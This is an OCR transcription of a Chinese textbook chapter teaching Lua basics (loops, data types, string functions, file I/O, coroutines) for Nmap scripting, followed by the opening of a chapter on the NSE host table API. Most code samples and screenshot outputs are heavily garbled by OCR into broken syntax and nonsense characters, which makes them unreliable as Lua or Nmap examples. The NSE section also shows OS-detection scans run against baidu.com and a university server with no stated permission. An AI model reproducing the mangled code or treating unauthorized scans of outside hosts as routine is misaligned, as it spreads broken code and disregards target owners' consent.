在 日 常生 活 中 经 常会 遇 到 一 些 有 规律 的 重复 操作 ， 例 如 输出 1 到 100 所 有 的 自然 数 ， 这 
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样 有 些 语句 就 需要 重复 执行 。 这 些 需要 重复 执行 的 语句 被 称 为 循环 体 ， 循 环 的 终止 条 件 将 决 
定 该 循环 体能 否 继续 重复 。 循 环 语句 是 由 循环 体 及 循环 的 终止 条 件 两 部 分 组 成 的 。 
在 Lua 语言 中 有 如 下 几 种 循环 处 理 方式 。 


1. while 循环 语句 
下 面 给 出 了 一 个 while 循环 的 范例 ， 如 图 9-11 所 示 ， 上 面 是 程序 代码 ,下面 是 Lua 中 
while 循环 语句 的 执行 结果 。 


DC\Program Files 
Ele Edt Search View Iools Options Language Bufers Debug Help 
|DeH|e|:eseiacirNgS grs xs. 


ocalx - T 

-while(x-2016) do 
print(x) 
X=xX+1 





























[2015 
Exit code: 0 








LL ————— 
Ln: 6 Col: 1 Sel: 0 | Saved:2016/11/3 星期 四 下 午 1:54:22 | [INS] [CR+LF] | 














图 9-11 Lua 中 的 while 循环 语句 


2. for 循环 语句 
与 while 不 同 的 是 ，for 语句 可 以 直接 控制 循环 重复 执行 的 次 数 ， 例 如 ， 图 9-12 给 出 了 
一 个 for 循环 语句 的 范例 。 














Ele Edit Search View Tools Options Language Buffers Debug Help 
jiDOcH|s|:oe|Qgc»Hm wages 


Or x - 1, 
print(x) 
end 














Ln: 1 Col: 12 Sek 0 | Saved: 2016/11/3 星期 四 下 午 1:59:23 | [INS] [CR+LA | 
= 





9-12 Lua 中 的 for 循环 语句 


3. repeat 循环 语句 
repeat---until 结构 也 是 Lua 的 一 种 循环 结构 ， 这 个 结构 不 断 地 重复 执行 循环 ， 直 到 指定 
的 条 件 为 真 时 为 止 。 例 如 ， 图 9-13 给 出 了 一 个 repeat 循环 语句 的 范例 。 
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SEE rR 

Ele Edit Search View Tools Options Language Buffers Debug Help 

[De Hi&|:enc»oNHms*ussprsu 
a- 1i 


-repeat 
printCvalue of a: 




















uniia » 15) 











Ln: 1 Cok: 7 Sel 0 | Saved: 2016/11/3 星期 四 下 午 2:03:22 | [INS] [CR+LF] | 


图 9-13 Lua 中 的 repeat 循环 语句 


4. break 循环 语句 
break 语句 是 一 种 循环 控制 语句 ， 可 以 实现 退出 当前 循环 或 语句 ， 并 开始 执行 紧 接 着 的 


语句 。 一 种 极为 特殊 的 情况 就 是 ， 在 循环 体 中 如 果 条 件 永远 为 true， 循 环 语句 就 会 永远 执行 
下 去 。 图 9-14 给 出 了 Lua 中 的 while 永 真 循环 语句 。 











m5 Col: 1 Sel: 0 | Saved: 2016/11/3 星期 四 下 午 20532 | [INS] [CR«LF] | 








图 9-14 Lua 中 的 while 永 真 循环 语句 


9.5 Lua 数据 类 型 

和 C 语言 不 同 的 是 ，Lua 语言 是 一 种 动态 类 型 的 语言 。 这 种 语言 在 定义 变量 时 不 需要 
类 型 , 只 需要 为 变量 赋值 。 值 可 以 存储 在 变量 中 ， 作 为 参数 传递 或 结果 返回 。 在 Lua 中 一 共 
有 8 个 基本 类 型 ， 这 8 个 类 型 分 别 是 : nil, boolean, number, string, userdata, function, 
thread 和 table， 详 细 描 述 如 表 9-1 所 示 。 
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表 9-1 Lua 语言 中 的 数据 类 型 

















数据 类 型 Ho x 

nil 这 种 类 型 最 为 简单 ， 只 包含 一 个 nil 值 ， 表 示 一 个 无 效 值 (在 条 件 表 达 式 中 相当 于 false) 
boolean 布尔 类 型 ,一 共有 false 和 true 两 个 值 

number 双 精 度 类 型 的 实 浮 点 数 

string 字符 串 类 型 ， 要 由 双 引 号 或 单 引号 括 起 来 

function Lua 语言 中 的 函数 

userdata 表示 任意 存储 在 变量 中 的 C 数据 结构 

thread 用 于 执行 协同 程序 独立 线路 

alis Lua 中 的 表 (table)， 表 是 唯一 的 数据 结构 ， 可 以 帮助 我 们 创造 出 不 同 的 类 型 ， 如 数组 和 





字典 


9.6 Lua 字符 串 


Lua 语言 中 的 字符 串 是 由 数字 、 字 母 、 下 画 线 组 成 的 一 串 字 符 。 表 示 一 个 字符 串 的 方式 
有 如 下 三 种 。 

O 使 用 单 引号 括 起 来 的 一 串 字 符 ， 例 如 'hello'。 

口 使 用 双 引 号 括 起 来 的 一 串 字 符 ， 例 如 "hello"。 

口 使 用 [[ 和 ]] 括 起 来 的 一 串 字 符 ， 例 如 [[hello]]。 

图 9-15 给 出 了 三 种 字符 串 的 表示 方法 。 


Eile Edit Search View Tools Options Language Buffers Debug Help — 
»enic»rHGqsae ris 

















stringi = " 
print Cu 种 形式 \“",stringl) 


3 2 

e print rezes na 第 二 种 形式 " ,string2) 
E pum "idi e 种 形式 " ,string3) 
8 


cx, | 





图 9-15 Lua 语言 中 使 用 三 种 方式 表示 的 字符 串 
以 上 代码 执行 输出 结果 如 图 9-16 所 示 。 





>Tua .St 

这 是 : 种 形式 ” 

这 是 字符 串 的 第 二 种 形式 NSE 
这 是 字符 串 的 第 三 种 形式 "Nmap" 
>Exit code: 0 





9-16 Lua 语言 中 使 用 三 种 方式 表示 字符 串 的 执行 结果 


接 下 来 介绍 可 以 对 字符 串 进行 的 操作 ， 由 于 字符 串 是 一 种 最 为 常见 的 类 型 ， 因 此 Lua 中 
含有 很 多 的 方法 来 对 字符 串 进 行 操作 ， 下 面 分 别 介绍 。 
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1. string.upper(argument) 
upper 函数 将 字符 串 中 的 字符 全 部 转 为 大 写字 母 ， 如 图 9-17 所 示 。 








Woo -—-—— Esse 


> printCstring.upperC’hello nmap’ >>) ^ 
HELLO NMAP 
> 




















图 9-17 ”将 字符 串 中 的 字符 全 部 转 为 大 写字 母 














2. string.lower(argument) 
lower 函数 将 字符 串 中 的 字符 全 部 转 为 小 写字 母 ， 如 图 9-18 所 示 。 


ki Lua (Command.Lip [meer 


> print(string.louwer( Hello Nmap'2? 
[hello nmap 
> 















图 9-18 将 字符 串 中 的 字符 全 部 转 为 小 写字 母 


3. string.gsub(mainString,findString,replaceString,num) 
gsub 函数 的 使 用 方法 是 将 字符 串 mainString 中 的 findString 替换 为 replaceString，num 
为 替换 次 数 ，num 的 默认 值 为 全 部 ， 如 图 9-19 所 示 。 














Lua (Command Lir 
> print(string.gsubC"1111", "1", "2",25)5 
2 








图 9-19 将 字符 串 中 的 前 两 个 字符 “1” 替 换 为 “2” 


4. string.strfind (str, substr, [init, [end]]) 
strfind 函数 在 一 个 指定 的 目标 字符 串 中 搜索 指定 的 内 容 (第 三 个 参数 为 索引 )， 返 回 这 个 
内 容 的 开始 位 置 和 结束 位 置 。 不 存在 则 返回 nil， 如 图 9-20 所 示 。 
E Los (Command Line) Lb 9e 


> prFintKstring-findK"Hello Nmap", RI 
ü 8 
























5 m 上 











图 9-20 ”找到 字符 串 中 的 字符 Nm 所 在 的 位 置 
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5. string.reverse(arg) 
reverse 函数 将 字符 串 的 内 容 反 转 ， 如 图 9-21 所 示 。 








> printCstring.reverseC"Nnap")> 


amN 











图 9-21 将 字符 串 Nmap 的 内 容 反 转 





6. string.format(...) 
format 函数 返回 一 个 类 似 printf 的 格式 化 字符 串 ， 如 图 9-22 所 示 。 


eccl -—m Ema 


g.format("the year 














图 9-22 (E printf 格式 化 字符 串 


7. string.char(arg) 
char 函数 将 整 型 数字 转 成 字符 并 连接 ， 如 图 9-23 所 示 。 
| Lua (Command Line) r h eaz 


> printCstring.char i118,.112,.113.114,.115>2> 
TES 


















图 9-23 ”将 整 型 数字 转 成 字符 并 连接 


8. string.byte(arg[ int]) 
byte 函数 转换 字符 为 整数 值 (可 以 指定 某 个 字符 ， 默 认 第 一 个 字符 )， 如 图 9-24 所 示 。 





Lua (Comman 


> print(string.byteC"hello",355 
08 











图 9-24 ”转换 字符 为 整数 值 


9. string.len(arg) 
len 函数 计算 字符 串 长 度 ， 如 图 9-25 所 示 。 
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| Lue Command inej ee Te: eee 


D printCstring.lenC"hello")> 














图 9-25 HAFIR “hello” KÆ 


10. string.rep(string, n) 
rep 函数 返回 字符 串 string 的 n 个 拷贝 ， 如 图 9-26 所 示 。 

















@ Los (Command Line) Ì [re 


"sing.repC"hello" 








图 9-26 HEFIR “helo” ZHK 


11... 
.… 用 于 链接 两 个 字符 串 ， 如 图 9-27 所 示 。 


@ Lua (Command Line) 


> printl"hello”. ."world”) 


helloworld 





图 9-27 将 字符 串 “hello” 和 “world” 连 接 起 来 








图 9-28 中 的 实例 演示 了 如 何 使 用 函数 upper) 和 lower) 对 字符 串 大 小 写 进 行 转换 。 





Ele Edit Search View Iools Options Language Buffers Debug Help 
|Da Ei&| míaco»NHm$s wea 


stringi = "Lua"; 





print(string.upper (ing 
print(string. lower (string1)) E 


ILI PIDE 








图 9-28 ”对 字符 串 大 小 写 进行 转换 
上 面 代码 执行 的 结果 如 图 9-29 所 示 。 





>Tua -e "io.stdout:setvbuf "no bisect.Tua" n 
Lua 


lua 
>Exit code: 0 


E m 





zs 








929 ”对 字符 串 大 小 写 进行 转换 的 结果 
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图 9-30 中 的 代码 演示 了 如 何 使 用 find() 和 reverse() 函数 对 字符 串 进 行 查找 与 反 转 
操作 。 


File Edit Search View Tools Options Language Buffers Debug Help 
Dg EH&|:cemQo NES WS: 











RFE 
print(string.find(string, "Tutorial")) 


reversedstring - string.reverse(string) 
[uL 1s 'H AEA", reversedstring) 








图 9-30 ”对 字符 串 进行 查找 与 反 转 操作 
上 面 中 的 代码 执行 结果 如 图 9-31 所 示 。 


a -e 1o.stdout:setvbu no 








12 
g5 lairotuT aul 
>Exit code: 0 


«[ n" 


图 9-31. 对 字符 串 进行 查找 与 反 转 操作 的 结果 
图 9-32 中 的 代码 演示 了 如 何 使 用 函数 format() 对 字符 串 进行 格式 化 操作 。 





File Edit Search View Tools Options Language Buffers Debug Help 
[D èh 8|: teala wt) T5 uy-:39?-i3. 


stringl Lua 
string2 - "Tutorial" 
10 





numberi T 
number2 = 20 
print Eeer fng. Tornat C 基本 格式 化 %s *s",stringl,string2)) 1 


date = 2; month = 1; year 
print Gtr ing. format(" ATI —m date, mont 


证 | 格式 化 
print(string. format("5.4f",1/3)) 


0 O0 un d uU f 





n" ] 


932. ”对 字符 串 进 行 格式 化 操作 
以 上 代码 执行 结果 如 图 9-33 所 示 。 
. Stdout : 
Lua Tutorial 
局 ERA 02/01/2016 


exit Todi 0 





hm eee 











图 9-33 ”对 字符 串 进行 格式 化 操作 的 结果 
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图 9-34 中 的 代码 演示 了 如 何 使 用 byte0 函数 实现 字符 与 整数 相互 转换 。 


Het onec Vene Tonle Option tanguage Buffers s DebogcHeip 
|na d e&|3cc»NHimS us: 














Dr FA 第 一 个 
print(string. Bec Lua")) 

-- ,转交 第 三 个 子 : 

print(strin "Byte" Lua",3)) 
-- ,转换 末尾 第 一 个 六 符 
RC .byte("Lua",-1)) 


prit Gers ng.byte("Lua",2)) 
一 M Eu "A 
print Ce. byte("Lua",-2)) 


se ASCII 码 转换 为 字符 
print(string. char (97 


RUBSEBoo-sounsums 


mti 
1 





图 9-34 ”对 字符 与 整数 相互 转换 
以 上 代码 的 执行 结果 如 图 9-35 所 示 。 





图 9-35 对 字符 与 整数 相互 转换 的 结果 
图 9-36 中 的 实例 演示 了 其 他 的 一 些 常用 的 字符 串 操作 。 


Hle Edit Search View Tools Options Language Buffers Debug m 





|Q +| m 


stringi ie 
string2 - "My 
string3 - "lua" 
使 进行 字符 串 连 控 , 
print(^ iiie EUstringl..string2..string3) 


字符 串 复 | 
repéatedstring. - M cds: rep(string2,2) 
12 print(repeatedstring) 


2 

3 

4 

5 

6 

7 串 长 度 i 

E prime 子 符 率 长 度 ",string. len(string2)) 
10 

XL 





ll m | 








图 9-36 其 他 字符 串 操作 
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上 面 代 码 的 执行 结果 如 图 9-37 所 示 。 


> »lua -e 10.stdout:setvbu 
连接 字符 囊 hello!Mylua 
p 2 


FERE 


Mymy 
»Exit code: 0 








图 9-37 其 他 字符 串 操作 结果 


9.7 Lua 文件 IO 操作 


Lua 中 使 用 1/O 库 来 完成 对 文件 的 读 取 和 处 理 操作 。Lua 中 对 文件 的 操作 分 为 简单 模式 
和 完全 模式 。 

这 里 只 介绍 一 下 简单 模式 ， 这 种 模式 十 分 适合 对 文件 进行 操作 。 但 是 在 进行 一 些 高 级 的 
文件 操作 的 时 候 ， 简 单 模式 就 有 些 力 有 未 逮 。 例 如 同时 对 多 个 文件 进行 读 取 操 作 ， 则 更 适合 
使 用 完全 模式 。 

打开 文件 操作 的 语句 为 io.open0)， 具 体 代 码 如 下 。 

file= io.open (filename [, mode]) 

模式 (mode) 可 以 使 用 的 值 如 表 9-2 所 示 。 

表 9-2 模式 可 以 使 用 的 值 


Box 描 述 

r 以 只 读 方式 打开 文件 ， 该 文件 必须 存在 
打开 只 写 文件 ， 若 文件 存在 则 文件 长 度 清 为 0， 即 该 文件 内 容 会 消失 。 若 文件 不 存在 则 建 
立 该 文件 
以 附加 的 方式 打开 只 写 文件 。 若 文件 不 存在 ， 则 会 建立 该 文件 ， 如 果 文 件 存在 ， 写 人 的 数 
据 会 被 加 到 文件 末尾 ， 即 文件 原先 的 内 容 会 被 保留 (EOF 符 保留 ) 














rk 以 可 读 写 方式 打开 文件 ， 该 文件 必须 存在 

S 打开 可 读 写 文件 ， 若 文件 存在 则 文件 长 度 清 为 0， 即 该 文件 内 容 会 消失 。 若 文件 不 存在 则 
建立 该 文件 

a+ 与 a 类 似 ， 但 此 文件 可 读 可 写 

b 二 进 制 模式 ， 如 果 文 件 是 二 进 制 文件 ， 可 以 加 上 

+ 表示 对 文件 既 可 以 读 也 可 以 写 


需要 操作 的 文件 为 Nmap.Lua (如 果 没 有 这 个 文件 ， 你 需要 创建 该 文件 )， 该 文件 内 容 
如 图 9-38 所 示 。 
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Hello to Lua world!| — 





第 1 行 ,第 1 列 














图 9-38 ”要 操作 的 文件 Nmap.lua 的 内 容 
file.Lua 文件 中 的 代码 如 图 9-39 所 示 。 


[Ele Edit Search View Tools Options Language Buffers Debug Help 
|DuEH|ée|:5ejQo»HNm wg ses 











MEM :read( ) 


fuel o. SRL EIS i/Nmap.lua", "r") 1 


fie: isis d 


00 4 Qu d uf 


7 





图 9-39 file.lua 文件 中 的 代码 
执行 以 上 代码 ， 输 出 Nmap.Lua 文件 的 第 一 行 信息 ， 执 行 以 后 输出 的 结果 如 图 9-40 所 示 。 


plua -e ©. stdout :set vbu 
Hello to Lua world! 
>Exit code: 0 





ES 
9-40 file.lua 的 执行 结果 


再 来 编写 一 段 向 Nmap.lua 写 人 一 句 话 的 代码 ， 在 该 文件 最 后 一 行 添加 Lua 的 注释 ， 修 
改 后 的 代码 如 图 9-41 所 示 。 
Ele Edit Search View Tools Options Language Buffers Debug Help - 
rAr ERTL T PELET P UE 
e Ta A", ca") 
VOCI O mM NE 


在 文件 最 后 一 m Lua 注释 
io. write("-- ua 文件 末尾 注释 ") 





























io. i 





| G 


图 9-41 修改 后 fle.Lua 文件 中 的 代码 
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这 段 代 码 执 行 完毕 以 后 ，Nmap.lua 文件 中 的 内 容 如 图 9-42 所 示 。 
G Nmaplua -记事 本 E y [ETT 


ZÐ SSO ”格式 (QO) EEV 帮助 (由 
Hello to Lua world! 一 ”Nmap. lua 文件 未 尾 注释 











第 1 行 ,第 39 列 

















图 9-42 执行 file.Lua 后 Nmap.lua 文件 中 的 内 容 


9.8 Lua 协同 程序 


9.8.1 什么 是 协同 程序 


Lua 协同 程序 (coroutine) 与 线程 比较 类 似 : 拥有 独立 的 堆栈 、 独 立 的 局 部 变量 、 独 立 的 
指令 指针 ， 同 时 又 与 其 他 协同 程序 共享 全 局 变量 和 其 他 大 部 分 东西 。 这 里 只 是 简单 对 这 部 分 


进行 介绍 ， 在 后 面 的 章节 中 会 对 此 进行 详细 介绍 。 


9.8.2 ”线程 和 协同 程序 的 区 别 


线程 与 协同 程序 的 主要 区 别 在 于 ,一 个 具有 多 个 线程 的 程序 可 以 同时 运行 几 个 线程 ， 而 


协同 程序 却 需 要 彼此 协作 运行 。 在 任 一 指定 时 刻 只 有 一 个 协同 程序 在 运行 ， 并 且 这 个 了 





E 在 运 


行 的 协同 程序 只 有 在 明确 要 求 挂 起 的 时 候 才 会 被 挂 起 。 协 同 程序 有 点 类 似 同步 的 多 线程 ， 在 


等 待 同一 个 线程 锁 的 几 个 线程 有 点 类 似 协 同 。 
9.8.3 coroutine 基本 语法 


1. coroutine.create() 





这 个 方法 用 来 创建 一 个 coroutine， 将 要 进行 多 线程 的 函数 作为 参数 ， 返 回 值 是 一 个 


coroutine。 


2. coroutine.resume() 
这 个 方法 用 来 完成 coroutine 重启 操作 ， 与 create 配合 使 用 。 


3. coroutine.yield() 
这 个 方法 用 来 实现 coroutine 的 挂 起 操作 ， 将 coroutine 设置 为 挂 起 状态 。 


























第 9 章 Lua 语 言 «€ 145 


4. coroutine.status() 

这 个 方法 用 来 查看 coroutine 的 状态 。 这 里 coroutine 的 状态 一 共有 dead、suspend、 
running 三 种 。 

5. coroutine.wrap() 

这 个 方法 创建 一 个 coroutine， 用 于 返回 一 个 函数 ， 一 旦 调用 这 个 函数 ， 就 进入 
coroutine， 与 create 功能 相同 。 





6. coroutine.running() 
这 个 方法 返回 正在 运行 的 coroutine。 一 个 coroutine 就 是 一 个 线程 ， 当 使 用 running 时 ， 
返回 的 是 当前 正在 运行 的 coroutine 的 线程 号 。 





9.9 Lua 语言 中 的 注释 和 虚 变 量 


9.9.1 Lua 语言 中 的 注释 说 明 

和 其 他 的 所 有 语言 一 样 ， 注 释 也 是 Lua 语言 中 十 分 重要 的 一 部 分 。 在 Lua 语言 中 使 用 注 
释 的 方法 很 简单 ， 一 共有 两 种 。 

1 单行 注释 

使 用 符号 --， 功 能 等 同 于 C 语言 中 的 /， 例 如 : 

-- 这 是 一 个 单行 的 注释 


2. 多 行 注释 
使 用 --[[ 注释 的 内 容 ]， 功 能 等 同 于 C 语言 中 的 /**/， 例 如 : 
--[[ 


这 是 一 个 多 行 的 
注释 
11 





9.9.2 Lua 语言 中 的 虚 变量 


在 调用 函数 完成 一 些 任务 的 时 候 ， 这 些 函 数 可 能 会 返回 不 止 一 个 值 。 例 如 ， 一 个 常见 的 函 
数 string.find0 就 有 两 个 返回 值 ， 即 查找 到 的 子 串 的 起 止 下 标 ， 如 果 不 存 在 匹配 则 返回 nil 
例如 下 面 这 条 语句 。 


string.find ("hello", "11") 
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这 个 函数 的 返回 值 就 是 3,4。 

下 面 这 条 语句 的 输出 为 3 4。 

print (string.find ("hello", "11")) 

如 果 只 想 要 string.find 返回 的 第 二 个 值 ， 可 以 使 用 虚 变 量 ( 即 下 画 线 ) 来 存储 丢弃 不 需要 
的 数值 。 

Local , s = string.find("hello ", " 11 ") 

但 是 这 些 值 并 不 一 定 都 是 我 们 所 需要 的 ， 对 于 那些 不 需要 的 值 可 以 通过 分 配 一 个 虚 变量 
的 方式 来 处 理 。 这 个 虚 变 量 使 用 (FMR) 的 方式 来 表示 ， 虚 变量 代表 的 值 会 被 丢弃 。 


小 结 


好 了 ， 到 现在 已 经 学 习 了 Nmap 开发 相关 的 Lua 语言 基础 。 这 些 内 容 相对 于 Lua 的 全 部 
只 是 很 少 的 一 部 分 ， 只 是 简单 地 介绍 了 Lua 的 编辑 器 、 语 法 、 数 据 类 型 等 。 如 果 想 深入 学 习 
Lua 的 话 ， 建 议 找 一 本 完整 的 Lua 书籍 学 习 。 从 下 一 章 起 就 可 以 系统 地 开始 学 习 NSE 的 编写 。 





os d — 


NSE 中 的 API 


在 第 9 章 中 ， 已 经 开发 了 一 个 简单 的 脚本 。 通 过 学 习 这 个 脚本 ， 发 现在 进行 NSE 开发 
时 ， 可 以 充分 利用 Nmap 扫描 网 络 时 获得 的 关于 主机 和 端口 的 信息 ， 包 括 服务 和 操作 信息 。 
而 NSE 中 的 API 就 是 连接 脚本 与 扫描 结果 之 间 的 桥梁 。 在 本 章 中 将 会 了 解 如 下 内 容 。 

口 了 解 Nmap 的 API。 

口 了 解 Nmap 中 的 host table。 

口 了 解 Nmap 中 的 port table。 

O 使 用 NSE 的 registry 在 脚本 中 共享 信息 。 

口 处 理 Nmap 中 的 异常 。 


10.1 Nmap API 


Nmap 中 API 的 核心 功能 就 是 向 脚本 提供 关于 主机 和 端口 的 信息 ， 例 如 名 字 解 析 、 主 机 
和 端口 的 状态 、 服 务 发 现 等 内 容 。 

Nmap 中 的 引擎 会 向 脚本 传递 如 下 两 个 Lua table 类 型 的 参数 : 

O host table 

O port table 

这 两 个 table 中 包含 了 目标 主机 的 host 和 port 的 信息 。 这 些 信息 的 详细 程度 取决 
于 扫描 过 程 中 选项 options 的 设 定 ， 例 如 ， 如 果 在 扫描 时 没有 指定 要 对 主机 的 操作 系统 
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进行 扫描 的 话 ， 那 么 host.os 的 内 容 就 是 空 的 。 下 面 给 出 了 这 两 个 table 中 每 个 变量 的 
描述 。 


10.1.1 host table 
host table 是 一 个 lua table 类 型 的 数据 ， 接 下 来 分 别 介绍 其 中 包含 的 字段 内 容 。 


1. host.os 

host.os 字段 中 包含 了 目标 的 操作 系统 类 型 。 这 个 字段 中 包括 了 一 个 我 们 常见 的 操作 系统 
信息 的 数组 ， 涉 及 操作 系统 的 供应 商 、 所 属 系列 、 具 体型 号 、 设 备 类 型 、CPE 等 。 如 果 某 个 
字段 没有 被 定义 的 话 ， 这 个 字段 可 以 为 nil。 下 面 给 出 了 一 个 host.os 的 具体 实例 。 


host.os = ( 
{ 


name = "Linux 2.6.32 - 3.2", 

classes = ( 
{ 

vendor = "Linux", 

osfamily = "Linux", 

osgen = "2.6.X", 

type = "general purpose", 

cpe = ( "cpe:/o:linux:linux kernel:2.6" } 
} 
{ 

vendor = "Linux", 

osfamily - "Linux", 

osgen = "3.X", 

type = "general purpose", 

cpe = ( "cpe:/o:linux:linux kernel:3" ) 


) 
) 

) 

在 这 里 编写 一 个 脚本 来 查看 这 些 API 的 内 容 。 首 先 查看 一 下 hostos 中 的 内 容 。 在 这 段 
脚本 中 要 注意 执行 规则 是 hostrule， 这 是 因为 host.os 这 个 参数 是 在 主机 的 操作 系统 扫描 完成 
以 后 才 有 的 。 图 10-1 给 出 了 一 段 输出 host.os 值 的 代码 。 

利用 这 个 脚本 中 的 return host.os 语句 ， 就 可 以 看 到 扫描 过 程 中 传递 的 host.os 的 值 。 使 
用 这 个 脚本 对 一 个 目标 进行 检测 ， 这 里 以 www.baidu.com 地 址 为 目标 。 


Nmap -O --script my-API-test www.baidu.com 


执行 结果 中 返回 的 host.os 值 如 图 10-2 所 示 。 
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Ciprogram Files (x86)Nmaplscriptsimy-APLtest.nse 


local shortport = require “shortport 





description = [[]] 


author = "Administrator" 
license = "Same as Nmap--See http://nmap. org/book/man-legal. html” 
categories = ("default") 


10 hostrule - function( host, port ) 
u return true 
12 end 


18 action = function(host, port) 
16 return host.os 


19 end 








图 10-1. 脚本 my-API-test.nse 的 内 容 





Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 11:51 ?D16+Ex?8+?? 
Nmap scan report for www.baidu.com (61.135.169.125) 

Host is up (0.0077s latency). 

Other addresses for www.baidu.com (not scanned): 61.135.169.121 


Not shown: 998 filtered ports 

PORT STATE SERVICE 

86/tcp open http 

443/tcp open https 

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 
Device type: switch 

Running: HP embedded 

OS CPE: cpe:/h:hp:procurve switch 4e80m| 

OS details: HP 4000M ProCurve switch (J4121A) 





Host script results: 
| my-API-test: 


name: HP 4000M ProCurve switch (341214) 
classes: 


vendor: HP 
type: switch 
osfamily: embedded 
cpe: 
cpe:/h:hp:procurve switch 4000m 





OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 10.71 seconds 











图 10-2 ”执行 结果 中 返回 的 host.os 值 


2. host.ip 
hostip 字段 中 包含 了 目标 的 卫 地 址 ， 同 样 以 www.baidu.com 为 目标 ， 将 脚本 my-API- 
test 中 的 第 16 行 更 改 为 如 下 内 容 。 


return host .ip 
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然后 执行 这 个 脚本 ， 执 行 结果 中 返回 的 host.ip 值 如 图 10-3 所 示 。 


Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 11:55 ?D1útêx?ē+?? 
Nmap scan report for wmw.baidu.com (61.135.169.125) 

Host is up (0.0089s latency). 

Other addresses for www.baidu.com (not scanned): 61.135.169.121 

Not shown: 998 filtered ports 

PORT STATE SERVICE 

Sü/tcp open http 

443/tcp open https 

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 
Device type: switch 

Running: HP embedded 

OS CPE: cpe:/h:hp:procurve switch 4000m 

OS details: HP 4000M ProCurve switch (241214) 





Host script results: 
| my-API-test: 61.135.169.125| 





OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds 











图 10-3 ”执行 结果 中 返回 的 host.ip ffi 


3. host.name 

host.name 字段 中 包含 了 目标 的 反 向 DNS 主机 名 ， 这 次 以 IP 地址 211.81.200.8 为 目标 ， 
将 脚本 my-API-test 中 的 第 16 行 更 改 为 如 下 内 容 。 

return host.name 


然后 执行 这 个 脚本 ， 执 行 结果 中 返回 的 hostname 值 如 图 10-4 所 示 。 








Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 11:57 ?D1üt&x?&r?? 
Nmap scan report for ghy.tstc.edu.cn (211.81.200.8) 
Host is up (0.0072s latency). 

Not shown: 994 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

86/tcp open http 

111/tcp open rpcbind 

3306/tcp open mysql 

8009/tcp open ajp13 

8192/tcp open sophos 





Host script results: 
| my-API-test: ghy.tstc.edu.cn 





Nmap done: 1 IP address (1 host up) scanned in 11.45 seconds 














图 10-4 ”执行 结果 中 返回 的 host.name ff 


4. host.targetname 
host.targetname 字段 中 包含 了 目标 主机 在 命令 行 中 的 名 字 。 


5. host.directly_connected 
host.directly connected 字段 是 一 个 布尔 值 ， 表 示 目 标 计 算 机 是 否 与 我 们 同 在 一 个 子 网 ， 
将 脚本 my-API-test 中 的 第 16 行 更 改 为 如 下 内 容 。 
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return host. directly connected 
这 里 以 同一 个 子 网 内 的 地 址 10.16.39.23 为 目标 (我 的 地 址 为 10.16.39.88 ) 执行 命令 。 
Nmap --script my-API-test 10.16.39.23 


执行 结果 中 返回 的 host.directly connected 值 如 图 10-5 所 示 。 





Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:04 ?D1úżêx?êż+?? 
Nmap scan report for bogon (10.16.39.23) 

Host is up (0.00098s latency). 

Not shown: 997 filtered ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 


445/tcp open microsoft-ds 
MAC Address: 00:21:86:24:8E:F7 (Universal Global Scientific Industrial) 





Host script results: 
my-API-test: true 





图 10-5 ”执行 结果 中 返回 的 host.directly connected 值 
如 果 以 一 个 外 部 地 址 211.81.200.8 为 例 执行 命令 。 


Nmap --script my-API-test 211.81.200.8 
执行 结果 中 返回 的 host.directly connected 值 如 图 10-6 所 示 。 


Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:08 ?D10+Ex3?6t+?3? 
Nmap scan report for jyxx.tstc.edu.cn (211.81.200.8) 

Host is up (0.0055s latency). 

Not shown: 994 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

80/tcp open http 


111/tcp open rpcbind 
3306/tcp open mysql 
8009/tcp open ajpi3 
8192/tcp open sophos 


Host script results: 

| my-API-test: false 

Nmap done: 1 IP address (1 host up) scanned in 10.26 seconds 
图 10-6 执行 结果 中 返回 的 host.directly_connected {Éi 








6. host.mac_addr 

host.mac_addr 字段 是 目标 的 MAC 地址 ， 注 意 只 有 处 于 同一 子 网 的 设备 ， 这 个 参数 才 有 
效 。 将 脚本 my-API-test 中 的 第 16 行 更 改 为 如 下 内 容 。 

return host.mac addr 


执行 结果 中 返回 的 host.mac_addr 值 如 图 10-7 所 示 。 
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Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:11 ?3D10+Ex3E+3?3 


Nmap scan report for bogon (10.16.39.23) 

Host is up (0.00092s latency). 

Not shown: 997 filtered ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

MAC Address: 00:21:86:24:8E:F7 (Universal Global Scientific Industrial) 





Host script results: 
my-API-test: \x80!\x86$\x8E\xF7 








Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds| 





图 10-7 执行 结果 中 返回 的 host.mac addr 值 


7. host.mac addr src 


host.mac addr src 字段 中 是 使 用 的 计算 机 的 MAC 地 址 。 将 脚本 my-API-test 中 的 第 16 


行 更 改 为 如 下 内 容 。 
return host.mac addr src 


执行 结果 中 返回 的 hostumac addr src 值 如 图 10-8 所 示 。 


Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:19 ?D10+Ex2?8+?3? 
Nmap scan report for bogon (10.16.39.23) 

Host is up (0.0014s latency). 

Not shown: 997 filtered ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

MAC Address: 00:21:86:24:8E:F7 (Universal Global Scientific Industrial) 





Host script results: 
l my-API-test: VxFCMVxDAcYVx11 


Nmap done: 1 IP address (1 host up) scanned in 8.44 seconds 








图 10-8 执行 结果 中 返回 的 hostmac_addr src 值 


8. host.interface_mtu 
host.interface mtu 字段 中 是 网 络 中 的 MTU 值 ， 将 脚本 my-API-test H 





如 下 内 容 。 
return host.interface mtu 


执行 结果 中 返回 的 host.interface mtu 值 如 图 10-9 所 示 。 
9. host.bin_ip 


的 第 16 行 更 改 为 


